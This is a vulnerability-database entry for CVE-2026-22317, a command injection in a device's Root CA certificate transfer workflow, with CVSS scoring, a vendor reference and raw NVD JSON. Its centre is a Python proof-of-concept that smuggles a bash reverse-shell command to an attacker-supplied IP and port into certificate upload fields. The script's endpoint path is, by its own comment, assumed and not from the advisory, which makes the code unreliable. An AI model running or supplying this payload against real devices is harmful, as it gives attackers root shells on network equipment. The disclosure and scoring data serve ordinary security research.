Security Vulnerability Report
CVE-2026-22317 CVSS 7.2 HIGH

CVE-2026-22317

Published: 2026-03-18 08:16:28
Last Modified: 2026-03-18 14:52:44

Description

A command injection vulnerability in the device’s Root CA certificate transfer workflow allows a high-privileged attacker to send crafted HTTP POST requests that result in arbitrary command execution on the underlying Linux OS with root privileges.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Affected device firmware versions: all versions earlier than the fixed release.
Exact version information must be taken from the vendor's official advisory.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2026-22317 PoC - Root CA Certificate Transfer Command Injection
# Target: Network device with vulnerable Root CA certificate transfer workflow


def exploit(target_url, attacker_ip, attacker_port):
    """
    Exploit CVE-2026-22317 by injecting command via certificate transfer workflow
    """
    # Construct malicious payload for reverse shell
    payload = f";bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1;"

    # Target endpoint for Root CA certificate transfer
    # (this path is assumed by the PoC; the advisory text does not name the endpoint)
    endpoint = f"{target_url.rstrip('/')}/api/v1/certificates/root-ca/upload"

    # Craft malicious certificate request
    files = {
        'certificate': (
            'cert.pem',
            f'-----BEGIN CERTIFICATE-----\n{payload}\n-----END CERTIFICATE-----',
            'application/x-pem-file',
        )
    }
    data = {
        'cert_name': f'test{payload}',
        'action': 'transfer',
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (compatible; CVE-2026-22317-PoC)',
        # The vulnerability requires a high-privileged account (PR:H in the CVSS vector)
        'Authorization': 'Bearer <HIGH_PRIVILEGE_TOKEN>',
    }

    try:
        print(f"[*] Sending exploit payload to {endpoint}")
        response = requests.post(endpoint, files=files, data=data, headers=headers,
                                 timeout=10, verify=False)
        print(f"[*] Response Status: {response.status_code}")
        print(f"[*] Check your listener on {attacker_ip}:{attacker_port}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return False
    return True


if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <attacker_ip> <attacker_port>")
        print(f"Example: python {sys.argv[0]} https://192.168.1.1 10.0.0.1 4444")
        sys.exit(1)
    exploit(sys.argv[1], sys.argv[2], sys.argv[3])
```

References

https://certvde.com/de/advisories/VDE-2025-104 (vendor advisory VDE-2025-104)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-22317",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-18T08:16:27.580",
    "lastModified": "2026-03-18T14:52:44.227",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A command injection vulnerability in the device’s Root CA certificate transfer workflow allows a high-privileged attacker to send crafted HTTP POST requests that result in arbitrary command execution on the underlying Linux OS with root privileges."
      },
      {
        "lang": "es",
        "value": "Una vulnerabilidad de inyección de comandos en el flujo de trabajo de transferencia de certificados de CA raíz del dispositivo permite a un atacante con altos privilegios enviar solicitudes HTTP POST manipuladas que resultan en la ejecución arbitraria de comandos en el sistema operativo Linux subyacente con privilegios de root."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-77"}]
      }
    ],
    "references": [
      {"url": "https://certvde.com/de/advisories/VDE-2025-104", "source": "[email protected]"}
    ]
  }
}
```